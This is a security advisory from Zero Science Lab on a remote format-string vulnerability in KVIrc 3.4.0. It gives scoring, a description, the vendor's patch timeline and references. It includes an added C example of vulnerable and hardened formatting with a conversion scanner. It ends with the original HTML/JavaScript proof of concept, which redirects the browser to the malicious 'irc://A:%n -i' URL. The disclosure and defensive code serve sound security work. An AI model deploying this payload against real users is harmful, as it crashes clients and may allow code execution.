CVSS2: 7.6 High (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Attack Vector: NETWORK
Attack Complexity: HIGH
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AI Score: 7.8 High (confidence: Low)
EPSS: 0.084 Low (percentile: 94.5%)
Title: KVIrc 3.4.0 Virgo Remote Format String Exploit PoC
Advisory ID: ZSL-2008-4901
Type: Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 24.10.2008
Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVIrc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC-addicted developers around the world.
Desc: KVIrc is prone to a remote format-string vulnerability: user-supplied input (an irc:// URL such as the one in the PoC below) reaches the format-specifier argument of a formatted-printing function without being sanitized, so conversions like %n in the attacker's string are interpreted rather than printed. A remote attacker may exploit this issue to execute arbitrary code with the privileges of the user running KVIrc. Failed exploit attempts crash the client, resulting in a denial of service.
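The following C is an added illustration, not code from the ZSL advisory or from KVIrc: it puts the vulnerable pattern (untrusted text used as the format) beside its hardened form (a literal format with the text as a %s argument), and adds a small scanner of printf-style conversion specifications that flags the PoC string "irc://A:%n -i" before it can reach a formatting call. The function names (scan_format, vlog_line, log_vulnerable, log_hardened, log_checked) and the "Connecting to %s" message are assumptions made for the example.

```c
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Result of scanning a string the way printf would read a format. */
struct fmt_scan {
    int conversions;  /* conversion specs that would consume an argument */
    bool writes;      /* true if a %n (write-through-pointer) conversion is present */
};

/* Parse printf-style conversion specifications: "%%" is a literal percent;
 * otherwise '%' is followed by flags, width, optional precision (a '*' in
 * either position consumes an argument of its own), length modifiers and a
 * conversion character. A lone '%' at the end is counted as one (malformed)
 * conversion, which is the conservative choice for a gate. */
struct fmt_scan scan_format(const char *s)
{
    struct fmt_scan r = {0, false};
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;                              /* "%%" prints '%' */
        while (*p && strchr("-+ #0", *p))
            p++;                                   /* flags */
        if (*p == '*') { r.conversions++; p++; }   /* width taken from an argument */
        else while (*p >= '0' && *p <= '9') p++;
        if (*p == '.') {                           /* precision */
            p++;
            if (*p == '*') { r.conversions++; p++; }
            else while (*p >= '0' && *p <= '9') p++;
        }
        while (*p && strchr("hlLqjzt", *p))
            p++;                                   /* length modifiers */
        if (*p == 'n')
            r.writes = true;
        r.conversions++;                           /* the conversion itself */
        if (*p == '\0')
            break;                                 /* spec truncated at end of string */
    }
    return r;
}

/* Internal formatter taking a caller-supplied format (hypothetical wrapper):
 * the shape of API that lets the bug happen, since nothing stops a caller
 * from passing untrusted text as fmt. */
static int vlog_line(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Vulnerable pattern: the attacker's string is the format. With the PoC URL
 * "irc://A:%n -i" the %n writes through whatever occupies the missing argument
 * slot. Defined for contrast only; never called with the PoC string below. */
int log_vulnerable(char *out, size_t n, const char *untrusted)
{
    return vlog_line(out, n, untrusted);
}

/* Hardened pattern: fixed literal format, untrusted text as a %s argument. */
int log_hardened(char *out, size_t n, const char *untrusted)
{
    return vlog_line(out, n, "Connecting to %s", untrusted);
}

/* Where a caller-supplied string really must act as a format (a message
 * template, say), refuse it unless it contains no conversions at all. */
int log_checked(char *out, size_t n, const char *maybe_format)
{
    if (scan_format(maybe_format).conversions != 0)
        return -1;                                 /* rejected: not a fixed template */
    return vlog_line(out, n, maybe_format);
}

int main(void)
{
    const char *poc = "irc://A:%n -i";             /* the URL from the PoC */
    char buf[80];
    struct fmt_scan r = scan_format(poc);
    printf("%s: %d conversion(s), writes memory: %s\n",
           poc, r.conversions, r.writes ? "yes" : "no");
    log_hardened(buf, sizeof buf, poc);
    printf("hardened: %s\n", buf);
    printf("checked:  %d\n", log_checked(buf, sizeof buf, poc));
    return 0;
}
```

The hardened form is the real fix; scan_format is for the places where a string still has to be a format (translated templates, user-configurable notices), where rejecting any conversion is simpler and safer than trying to whitelist some.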
Vendor: Szymon Stefanek - <http://www.kvirc.net>
Affected Version: 3.4.0 Virgo
Tested On: Microsoft Windows XP Professional SP2 (English)
Vendor Status:
[29.10.2008] Vendor has knowledge about the issue.
[04.11.2008] Vendor releases patch.
Credits: Vulnerability discovered by Gjoko Krstic - <[email protected]>
References:
[1] <http://www.milw0rm.com/exploits/6832>
[2] <http://www.packetstormsecurity.org/filedesc/kvirc-format.txt.html>
[3] <http://www.sebug.net/exploit/4944>
[4] <http://www.securityfocus.com/bid/31912>
[5] <http://www.vupen.com/english/advisories/2008/2926>
[6] <http://www.secunia.com/advisories/32410>
[7] <http://www.juniper.net/security/auto/vulnerabilities/vuln31912.html>
[8] <https://vulners.com/cve/CVE-2008-4748>
[9] <http://xforce.iss.net/xforce/xfdb/46114>
[10] <http://it.com.mk/index.php/Gjoko-Krstikj/Sigurnost/KVIrc-v3.4.0-Virgo-Remote-Format-String-Exploit-PoC>
[11] <http://www.osvdb.org/show/osvdb/49352>
Changelog:
[24.10.2008] - Initial release
[27.10.2008] - Added reference [10]
[29.10.2008] - Added Vendor Status
[04.11.2008] - Updated Vendor Status
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<!--
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVIrc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC addicted developers around the world.
Product web page: http://www.kvirc.net/
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
24.10.2008
--><html>
<head><title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</title>
</head><body>
<center> <br/> <br/> <strong>Warning ! :)</strong> </center>
<script type="text/javascript">
alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");
function poc()
{
    // Navigating to an irc:// URL hands it to the application registered for
    // that scheme (KVIrc on the tested system); the "%n" in the URL is then
    // consumed as a format conversion instead of being printed literally.
    window.location.href = "irc://A:%n -i";
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
poc();
}
else
{
window.location.href = "http://www.kvirc.net";
}
</script> </body></html>